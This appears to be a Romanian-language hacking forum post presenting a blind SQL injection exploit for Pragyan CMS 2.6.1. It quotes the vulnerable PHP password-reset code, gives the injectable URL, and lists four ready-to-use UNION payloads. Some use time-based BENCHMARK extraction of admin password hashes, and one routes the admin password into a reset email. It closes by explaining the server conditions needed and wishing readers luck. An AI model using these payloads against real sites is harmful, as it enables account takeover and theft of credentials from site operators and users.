Jump to content
vladiii

Pragyan CMS 2.6.1 Blind SQL Injection

Recommended Posts

In /cms/login.lib:


$key = $_GET['key'];
$user_email = $_GET['resetPasswd'];
$password = rand();
$dbpassword = md5($password);
$query = "SELECT * FROM `" . MYSQL_DATABASE_PREFIX . "users` WHERE `user_email`='" . $user_email . "'";
$result = mysql_query($query);

Datorita .htaccess, linkul cu parametrul vulnerabil va fi:


[url]http://site.xxx/home/+login&subaction=resetPasswd&key=asd&resetPasswd=[/url][SQL]

[SQL1] = ' UNION SELECT IF (SUBSTRING(user_password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8 from pragyanV2_users where user_email='adresadeemail@mail.com

[SQL2] = ' UNION SELECT IF (SUBSTRING(user_password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8 from pragyanV2_users where user_id='1

[SQL3] = ' UNION SELECT IF (SUBSTRING(user_password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8 from pragyanV2_users where user_name='admin

[SQL 4 - versiune sysgh0st [inovatie !]] = ' UNION ALL SELECT 1,2,CONCAT('mail@mail.com;',(SELECT `user_password` FROM `pragyanv2_users` WHERE `user_id`=1),'@',(SELECT `user_name` FROM `pragyanv2_users` WHERE `user_id`=1),'.org'),4,5,6,7,8#
Aceasta trimite parola pe email !

NOTA ! Sintaxa functioneaza doar daca magic_quotes_gpc sunt off in php.ini ! In .htaccess avem:

##Enable magic quotes in PHP, in case it is turned off in php.ini
php_flag magic_quotes_gpc on

Pe un apache acea comanda poate provoca eroare 500 (datorita php_flag) (sunt cazuri in care .htaccess este scos sau chiar sters) si userul (evident ! :D) va elimina php_flag_blabla ! Deci conditiile finale ar fi magic_quotes_gpc = off.

Bafta !

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...